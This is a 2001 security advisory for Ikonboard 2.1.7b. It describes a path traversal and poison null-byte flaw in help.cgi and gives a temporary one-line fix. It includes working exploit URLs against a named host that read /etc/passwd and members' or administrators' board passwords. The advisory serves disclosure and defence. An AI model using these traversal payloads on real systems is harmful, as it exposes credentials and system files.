Ikonboard Exploit (v.2.1.7b)

Author: Martin J. Muench

Date: 11 Mar 2001

-[ Product: Ikonboard
-[ Version: 2.1.7b
-[ OS: Unix, NT
-[ Vendor: Notified, http://www.ikonboard.com

-=[ Summary ]=-

This is another bug in the Ikonboard.
Anyone can read any file on the remote system with the privileges of the web server.

-=[ Problem ]=-

File: help.cgi

---[L.44]---
$inhelpon = $query -> param('helpon');
---
As we can see, $inhelpon is the input for 'helpon'

---[L.95-97]---
$filetoopen = "$ikondir" . "help/$inhelpon.dat";
$filetoopen = &stripMETA($filetoopen);
open(FILE, "$filetoopen") or die "Cannot locate the required files";
---
Well, it sets the file, runs it through the filter and opens it.
-> $inhelpon, remember?! ;-)

Ok, i am not going to post the whole filter it uses because they really have been able
to write a filter that is 24 lines long.
And they finally forgot to filter the backslash, so we can easily just attach the 'poison
null-byte' to '$inhelpon' and we escape the '.dat'.
And of course the scripts doesn't check for "..", so we can specifiy every path we want.

-=[ Exploit ]=-

Example:

http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
- would show the password file, if it is readable with the privileges of the web server.

http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/<member>.cgi%00
- replace <member> with the member name and it shows you his/her board-password.
(works with Administrator accounts too)

-=[ Patches ]=-

Not yet available.
You could fix the script temporary by inserting the following line under line 45 in 'help.cgi':

$inhelpon =~ s/\///g;

This is lame, but it works.

Martin J. Münch <mjm(-@-)codito.de>
http://www.codito.de

"Perl - The only language that looks the same before and after RSA encryption."
- Keith Bostic